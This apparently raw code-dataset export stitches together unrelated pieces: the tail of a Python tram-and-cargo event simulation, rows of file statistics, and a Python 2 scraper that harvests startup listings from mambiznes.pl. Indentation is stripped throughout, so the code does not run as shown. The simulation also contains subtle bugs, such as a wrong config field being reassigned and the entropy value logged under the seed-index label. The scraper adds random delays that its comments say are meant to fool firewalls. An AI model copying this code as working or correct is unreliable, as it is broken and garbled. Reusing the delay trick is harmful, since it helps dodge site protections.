GLOBAL VARIABLES
----------------
- These variables must be resetted after every simulation run
"""
#: now Simulation Clock
now = -1
#: last_now Last event
last_now = 0
#:event_queue Event queue
event_queue = []
#:trams List of running trams
trams = []
#:stops List of stops
stops = []
#:cargo List of cargo
cargo = []
#:updates List of updates
updates = set()
#:numEvents Number of total events
numEvents = 0
def reset_variables():
"""
Function to reset all global variables
"""
global now, last_now, numEvents, trams, stops, event_queue, cargo, updates
now = -1
last_now = 0
numEvents = 0
if trams:
trams[0].reset()
trams.clear()
for stop in stops:
stop.reset()
stops.clear()
event_queue.clear()
Passengers.reset()
if cargo:
cargo[0].reset()
cargo.clear()
updates.clear()
"""
SIMULATION LOGGING
------------------
- Simluation log (Text File): Includes all information about the events in the simulation
- Entities Log (csv file): Includes the relevant data information of single entities
"""
# "Simulation Log": What does in a single simulation run happen? (Descriptive)
sim_log = logging.getLogger("simulation")
# "Entities Log": How do the variables change during one simulation run?
ent_log = logging.getLogger("entities")
"""
SIMULATION METHODS
------------------
"""
def run(instance, passengerData, seed=False, index_child_seed=False):
"""
Run the simulation
:param instance: Path to the instance file
:param passengerData: Path to the passenger data file
:param seed: Seed to replicate the simulation
:param index_child_see: Index of the child of the global seedsequence
"""
# Used global variables
global inst, now, last_now, event_queue, numEvents
""" Initialise random generator """
# Check seed for random generator
if seed:
# seed sequence
entropy = seed.entropy
else:
seed = rdm.SeedSequence()
entropy = seed.entropy
# Import instance (from .py-file)
inst = dtm.import_instance(instance)
# Initialize the simulation
passenger = initialize(seed, passengerData)
# Run the simulation
running = True
while running:
# sort the upcoming events according to the time they occur
event_queue = sorted(event_queue,key = lambda i: i['time'])
if event_queue:
if event_queue[0]['time'] != now:
if now >= 0:
status(now)
for entity in updates:
if entity == "passenger":
entity = passenger
entity.last_event = now
write_entities_log(entity,now)
updates.clear()
last_now = now
now = event_queue[0]['time']
sim_log.info("\n-----------------------------------------------------------------------------------")
sim_log.info(f"Events at {now}:")
sim_log.info("***")
next_event()
numEvents+= 1
event_queue.pop(0)
# No more events
else:
last_time_period(inst.numPeriods-1,passenger)
running = False
# Save values for replicability
sim_log.info(f"\nentropy:\n{entropy}\n")
sim_log.info(f"index_child_seed:\n{entropy}\n")
# Reset after simulation run
reset_variables()
# Initialisation
def initialize(seed, passengerData):
"""
This function initialises the simulation run, i.e., creates the needed variables and adds the first events to the event log.
:param seed: Seed for replicability
:type seed: int
:param passengerData: Path to passenger data file
:type passengerData: string or path
:return: Global passenger object to track number of passengers
:rtype: Passengers object
"""
global event_queue
sim_log.info("Initialisation...\n--------------------------------------")
# Create child seedsequence per entity
seeds = seed.spawn(10)
# Entities Log
init_entities_log()
# initialize stops
for s in range(inst.numStops):
#sim_log.info("Creating Stop {}.".format(s))
distance_to = {"Stop": inst.stops_distance[s],"Customer": [0]}
distance_from = {"Stop": [inst.stops_distance[j][s] for j in range(inst.numStops)], "Customer": [0]}
if s == 0:
stops.append(Stop(distance_to,distance_from,True))
else:
stops.append(Stop(distance_to,distance_from))
pas = dtm.import_instance(passengerData)
""" Initialize passengers """
passenger_seeds = seeds[0].spawn(6)
if config.random_passenger_arrival:
arriving = pas.arriving_intensity
config.random_passenger_arrival = passenger_seeds[0]
else:
arriving = pas.passenger_arriving
# instantiate passenger arrivals
nonzero = np.nonzero(arriving)
for i in range(len(nonzero[0])):
p = nonzero[0][i]
s = nonzero[1][i]
create_event(p, 6, [s])
if config.random_passenger_boarding:
config.random_passenger_boarding = passenger_seeds[1]
if config.random_passenger_alighting:
config.random_passenger_boarding = passenger_seeds[2]
if config.random_passenger_changing:
config.random_passenger_changing = passenger_seeds[3]
if config.random_boarding_time:
config.random_boarding_time = passenger_seeds[4]
if config.random_alighting_time:
config.random_alighting_time = passenger_seeds[5]
""" Global passenger variables """
passenger = Passengers(
# passenger arrival
random_arrival = config.random_passenger_arrival,
arriving_passengers = arriving,
arriving_passengers_cum = pas.passenger_arriving_acc,
# passenger boarding
random_boarding = config.random_passenger_boarding,
boarding_rate = [1 for tram in range(inst.numTrams)],
# passenger alighting
random_alighting = config.random_passenger_alighting,
alighting_rate = pas.passenger_allighting_rate,
# passenger changing
random_changing = config.random_passenger_changing,
changing_rate = [0 for tram in range(inst.numStops)],
# time
random_boarding_time = config.random_boarding_time,
random_alighting_time = config.random_alighting_time,
service_time = inst.passenger_service_time_board,
service_time_alight = inst.passenger_service_time_alight,
)
# Initialize the starting times of each tram
tram_seeds = seeds[1].spawn(inst.numTrams)
for t in range(inst.numTrams):
sim_log.info(f"Tram {t} will start at {inst.tram_time_arrival[t][0]}.")
Tram.numTotal += 1
create_event(inst.tram_time_arrival[t][0],1,[t,tram_seeds[t]])
# Initialize the cargo release
cargo_seeds = seeds[2].spawn(inst.numCargo)
for c in range(inst.numCargo):
sim_log.info(f"Cargo request {c} will start at {inst.cargo_release[c]}.")
create_event(inst.cargo_release[c],5,[c,cargo_seeds[c]])
# sort the event queue according to the time
event_queue = sorted(event_queue,key = lambda i: i['time'])
sim_log.info("\n-----------------------------------------------------------------------------------\n")
return passenger
def last_time_period(time,passenger):
"""
Write the log for the last period of the simulation
:param time: last period
:type time: float
:param passenger: passenger object
:type passenger: Passengers object
"""
status(time)
for t in trams:
write_entities_log(t,time)
for s in stops:
write_entities_log(s,time)
write_entities_log(passenger,time)
for c in cargo:
c.estimate_delay(time)
write_entities_log(c,time)
def status(time):
"""
Add the status of all entities to the simulation log
:param time: Time of update
:type time: float
"""
global updates
sim_log.info("\n*~* Status *~*")
for t in trams:
t.info()
if len(t.sequences) < t.stopped:
t.sequences.append( {"time": time, "cargo": t.cargosize, "passengers": t.passengers, "delay": t.delay} )
for t in stops:
t.info()
if len(t.sequences) < t.stopped:
t.sequences.append( {"time": time, "cargo": t.cargosize, "passengers": t.passengers} )
CargoRequest.info()
Passengers.info()
"""
METHODS FOR HANDLING EVENTS
---------------------------
"""
def create_event(t,event_id,par):
"""
Creating a new event given an event id and a list of parameters (if the event is within the time horizon)
:param t: time
:type t: float
:param event_id: event id
:type event_id: int
:param par: event parameters
:type par: list
"""
if np.ceil(t) < inst.numPeriods:
event_queue.append({"time": t, "id":event_id,"par":par})
def next_event():
"""
Execute the next event in the event queue
"""
# Choose the next event
event = event_queue[0]
# Extract event id and parameters
event_id = event["id"]
par = event["par"]
# Event-id: 1
# Description: Starting a new tram
if event_id == 1:
starting_tram(par[0],seed=par[1])
# Event-id: 2
# Description: Tram reaches stop (but does not enter yet)
if event_id == 2:
tram_reaches_stop(par[0])
# Event-id: 3
# Description: Tram enters stop
if event_id == 3:
tram_entering_stop(par[0])
# Event-id: 4
# Description: Tram leaves stop (and next tram can enter this stop)
if event_id == 4:
tram_leaves_stop(par[0])
# Event-id: 5
# Description: Cargo is released
if event_id == 5:
starting_cargo(par[0], seed=par[1])
# Event-id 6:
# Description: Update passengers
if event_id == 6:
passenger_update(par[0])
"""
EVENT METHODS
-----------------------------------
"""
def starting_tram(index,seed):
"""
Event no. 1: Starting a tram
:param index: Index of the tram
:type index: int
:param seed: Seed for replicability
:type seed: int
"""
global now, updates
tram_id = len(trams)
if config.random_travel_time:
config.random_travel_time = seed
# debugging
#logger.debug(f"tram_travel_deviation: {config.tram_travel_deviation}")
# if passengers and cargo share vehicles
if inst.scheme == "SV":
trams.append(Tram(
tour = inst.tram_tour[index],
capacity_passenger = inst.tram_capacity-inst.tram_capacity_min_cargo,
capacity_cargo = inst.tram_capacity-inst.tram_capacity_min_passenger,
capacity_total = inst.tram_capacity,
schedule_arrival = inst.tram_time_arrival[index],
schedule_departure = inst.tram_time_departure[index],
speed = inst.tram_speed,
# Simulation deterministic by default
random_travel_time = config.random_travel_time,
travel_deviation = config.tram_travel_deviation,
max_service = inst.tram_max_service
)
)
# if passengers and cargo have dedicated vehicles
elif inst.scheme == "SI":
if index in inst.cargo_tram_assignment:
# cargo tram
trams.append(Tram(
tour = inst.tram_tour[index],
capacity_passenger = 0,
capacity_cargo = inst.tram_capacity_cargo,
capacity_total = inst.tram_capacity,
schedule_arrival = inst.tram_time_arrival[index],
schedule_departure = inst.tram_time_departure[index],
speed = inst.tram_speed,
# Simulation deterministic by default
random_travel_time = config.random_travel_time,
travel_deviation = config.tram_travel_deviation,
max_service = inst.tram_max_service
)
)
else:
# passenger tram
trams.append(Tram(
tour = inst.tram_tour[index],
capacity_passenger = inst.tram_capacity,
capacity_cargo = 0,
capacity_total = inst.tram_capacity,
schedule_arrival = inst.tram_time_arrival[index],
schedule_departure = inst.tram_time_departure[index],
speed = inst.tram_speed,
# Simulation deterministic by default
random_travel_time = config.random_travel_time,
travel_deviation = config.tram_travel_deviation,
max_service = inst.tram_max_service
)
)
tram = trams[-1]
if tram.is_operating:
tram_reaches_stop(tram_id)
else:
updates.add(tram)
def tram_reaches_stop(tram_id):
"""
Event no. 2: Tram reaches stop. It either queues up or enters the stop.
:param tram_id: tram id
:type tram_id: int
"""
global now
tram = trams[tram_id]
tram.reach_next_location(now)
stop = stops[tram.tour[tram.position]]
if stop.check_queue(tram):
tram_entering_stop(tram_id)
else:
updates.add(tram)
def tram_entering_stop(tram_id):
"""
Event no. 3: Tram enters the platform of the stop.
:param tram_id: tram id
:type tram_id: int
"""
global now, updates
tram = trams[tram_id]
stop=stops[tram.tour[tram.position]]
tram.enter_next_stop(stop,now)
boarding_time = 0
alighting_time = 0
# Update passengers
if tram.passenger_transport:
boarding_time, alighting_time = passenger_update(stop.index,True,True)
# Compute leaving time with passengers only
leaving_time = tram.compute_leaving_time(now,boarding_time,alighting_time)
new_leaving_time = False
if tram.cargo_transport:
# unloading
tram_cargoload = copy.copy(tram.cargoload)
for c in tram_cargoload:
request = cargo[c]
if request.end_stop == stop.index:
unloading_time = request.unload(tram,stop,now)
new_leaving_time = tram.compute_leaving_time(now,unloading_time=unloading_time)
updates.add(request)
tram_cargoload.clear()
# loading
stop_cargoload = copy.copy(stop.cargoload)
for c in stop_cargoload:
request = cargo[c]
if request.assigned_vehicle == tram.index:
loading_time = request.load(tram,stop)
new_leaving_time = tram.compute_leaving_time(now,loading_time=loading_time)
updates.add(request)
stop_cargoload.clear()
updates.add(tram)
create_event(tram.leaving_time, 4, [tram_id])
return updates
def tram_leaves_stop(tram_id):
"""
Event no. 4: Tram leaves the stop.
:param tram_id: tram id
:type tram_id: int
"""
global now
tram = trams[tram_id]
stop = stops[tram.tour[tram.position]]
if tram.leaving_time == now:
travel_time = tram.leave_location(stop,now)
updates.add(tram)
updates.add(stop)
if tram.is_operating:
create_event(now + travel_time, 2, [tram_id])
next_tram = stop.next_tram_in_queue(tram)
if next_tram >= 0:
create_event(now + inst.min_time_next_tram , 3, [next_tram])
def starting_cargo(index,seed):
"""
Event no. 5: New cargo request arrives
:param index: cargo index
:type index: int
:param seed: seed for randomisation
:type seed: int
"""
global now, updates, trams
# Generate new cargo request
cargo.append(CargoRequest(
release = inst.cargo_release[index],
deadline = inst.cargo_station_deadline[index],
end_stop = inst.cargo_station_destination[index],
assigned_vehicle = inst.cargo_tram_assignment[index],
stop = stops[0],
service_time = inst.cargo_service_time_load,
service_time_unload = inst.cargo_service_time_unload,
size = inst.cargo_size,
random_service_time = seed,
)
)
request = cargo[-1]
# Check if tram is currently at platform
stop = stops[request.start_stop]
# Update the log of stop and request
updates.add(stop)
updates.add(request)
# If the assigned vehicle is currently at the depot
if stop.current_tram == request.assigned_vehicle:
# load tram
tram = trams[request.assigned_vehicle]
# update the current loading and leaving time of the tram
loading_time = request.load(tram, stop)
leaving_time = tram.compute_leaving_time(now,loading_time = loading_time)
# update the log of the tram
updates.add(tram)
# Did the leaving time change?
if leaving_time:
# -> Create a new event for leaving the stop
create_event(leaving_time, 4, [tram.index])
def passenger_update(stop_id,recent_tram_arrival = False, consider_tram=False):
"""
Event no. 6: New passengers arrive and/or alight and board a vehicle
:param stop_id: Index of the stop
:type stop_id: int
:param recent_tram_arrival: New arrival of tram (True) or update while tram is waiting (False)?, defaults to False
:type recent_tram_arrival: bool, optional
:param consider_tram: Consider boarding and alighting process (True) or only arrival (False), defaults to False
:type consider_tram: bool, optional
:return: boarding and alighting time
:rtype: tuple
"""
global now, updates
stop = stops[stop_id]
if consider_tram:
tram_id = stop.current_tram
else:
tram_id = -1
# Update arriving passengers
Passengers.arrival(now,stop)
boarding_time = 0
alighting_time = 0
# if currently a tram waits at the platform
if tram_id >= 0:
tram = trams[tram_id]
if recent_tram_arrival or tram.leaving_time != now:
if recent_tram_arrival:
# compute number and time for alighting passengers
alighting_passengers, alighting_time = Passengers.alighting(stop,tram,now)
# compute number and time for boarding passengers
boarding_passengers, boarding_time = Passengers.boarding(stop,tram,now)
if recent_tram_arrival:
# compute number and time for changing passengers
changing_passengers = Passengers.changing(stop,alighting_passengers,now)
# Update leaving time
if not recent_tram_arrival:
leaving_time = tram.compute_leaving_time(now,boarding_time,alighting_time, 0, 0)
updates.add(tram)
#write_entities_log(tram,now)
# Did the leaving time change?
if leaving_time:
create_event(leaving_time, 4, [tram_id])
#next_arrival = Passengers.compute_next_arrival_time(now,stop,tram)
#if next_arrival:
# create new event (for passengers that may arrive before the current tram leaves)
#create_event(next_arrival, 6, [stop_id])
updates.add(stop)
updates.add("passenger")
return boarding_time, alighting_time
| 29.100418 | 134 | 0.600096 | 2,450 | 20,865 | 4.923673 | 0.127755 | 0.017243 | 0.02089 | 0.004559 | 0.301832 | 0.247617 | 0.211556 | 0.174335 | 0.164221 | 0.151455 | 0 | 0.005979 | 0.302612 | 20,865 | 717 | 135 | 29.100418 | 0.823036 | 0.231201 | 0 | 0.274096 | 0 | 0 | 0.038044 | 0.022732 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039157 | false | 0.150602 | 0.03012 | 0 | 0.078313 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9fccdafbf659c38a1a762c6f3bc28239cbcc246f | 3,175 | py | Python | parser.py | bitounu/startupy | 490a48a5e83900d91c5a2a67bb7fd286112f49f4 | [
"Unlicense"
] | null | null | null | parser.py | bitounu/startupy | 490a48a5e83900d91c5a2a67bb7fd286112f49f4 | [
"Unlicense"
] | null | null | null | parser.py | bitounu/startupy | 490a48a5e83900d91c5a2a67bb7fd286112f49f4 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# zależności Pythona: BeatifulSoup
# instalacja z pakietu
# Debian /Ubuntu: apt-get install python-bs4
# albo
# easy_install beautifulsoup4
# lub
# pip install beautifulsoup4
# skrypt robi spis firm ze stron mambiznes.pl
# i wypluwa CSV:
# Kolumny:
# fid
# nazwa - Nazwa firmy
# url - url do strony w mambiznes.pl
# opis - skrócony opis
# full - link do lokalnego pliku z pełnym opisem
# ourl - url do oryginalnej strony firmy
import sys
import urllib2
import random
from time import sleep
from bs4 import BeautifulSoup
from bs4 import SoupStrainer
# identyfikator firmy
fid = 0
# ile stron ma indeks na mambiznes.pl (trzeba sprawdzać ręcznie)
# dziś (18.09.2017) jest 53
ILE_STRON = 53
# plik z indeksem firm
CSV_FILE = "startupy.csv"
# parametr do sleep() do oszukiwania firewalli
MNOZNIK = 10
# nagłówek każdego pliku z pełnym opisem firmy
html_header = """
<!DOCTYPE html>
<html lang="pl-PL">
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="mambiznes.css" type="text/css">
"""
html_footer = """
</body>
</html>
"""
# zawężam wyszukiwanie na stronach indeksów do diva "main"
only_main = SoupStrainer("main")
# zawężam wyszukiwanie na stronie firmy do diva z klasą
only_opis = SoupStrainer("div", class_="post-desc np")
# ćwiczę na lokalnym pliku
#plik = open('test.html', 'r').read()
#artin = (BeautifulSoup(plik, "html.parser", parse_only=only_main))
# wypluwam CSV
def skanuj(artin):
global fid
linia = ""
for x in artin.find_all("div", class_="article-bottom"):
fid += 1
sys.stdout.write('.')
sys.stdout.flush()
opis_file = str(fid) + ".html"
url = x.find('a', class_='dib title').get('href')
nazwa = x.find('a', class_='dib title').contents[0]
linia += \
'"' + \
str(fid) + \
'","' + \
nazwa + \
'","' + \
url + \
'","' + \
x.find('p', class_="excerpt").contents[0] + \
'","' + \
opis_file + \
'",""' + \
"\n"
# trzeba pobrać pełny opis firmy
# opóźnienie żeby zmylić ew. proxy
sleep(random.random() * MNOZNIK/1.3)
opis_url = urllib2.urlopen(url)
opis = (BeautifulSoup(opis_url, "html.parser", parse_only=only_opis))
plout = open(opis_file, 'w')
txtout = html_header + "<title>" + nazwa.encode('utf-8') + "</title>\n</head>\n\n<body>" + str(opis) + html_footer
plout.write(str(txtout))
plout.close()
return linia.encode('utf-8')
# pobieram dane z portalu
print "Pobieram strone:"
out = "fid,nazwa,url,opis,full,ourl\n"
for i in range(1, ILE_STRON+1):
sys.stdout.write(str(i))
sys.stdout.flush()
weburl = "https://mambiznes.pl/startupy/page/" + str(i)
data = urllib2.urlopen(weburl)
artin = (BeautifulSoup(data, "html.parser", parse_only=only_main))
out += skanuj(artin)
sys.stdout.write('done\n')
sys.stdout.flush()
#print out
# można do pliku, żeby mieć to w d.
fout = open(CSV_FILE, 'w')
fout.write(out)
fout.close()
| 28.097345 | 122 | 0.610079 | 418 | 3,175 | 4.566986 | 0.433014 | 0.028287 | 0.023573 | 0.029859 | 0.060241 | 0.048193 | 0 | 0 | 0 | 0 | 0 | 0.014173 | 0.244409 | 3,175 | 112 | 123 | 28.348214 | 0.781576 | 0.328819 | 0 | 0.132353 | 0 | 0 | 0.197042 | 0.027195 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.088235 | null | null | 0.014706 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.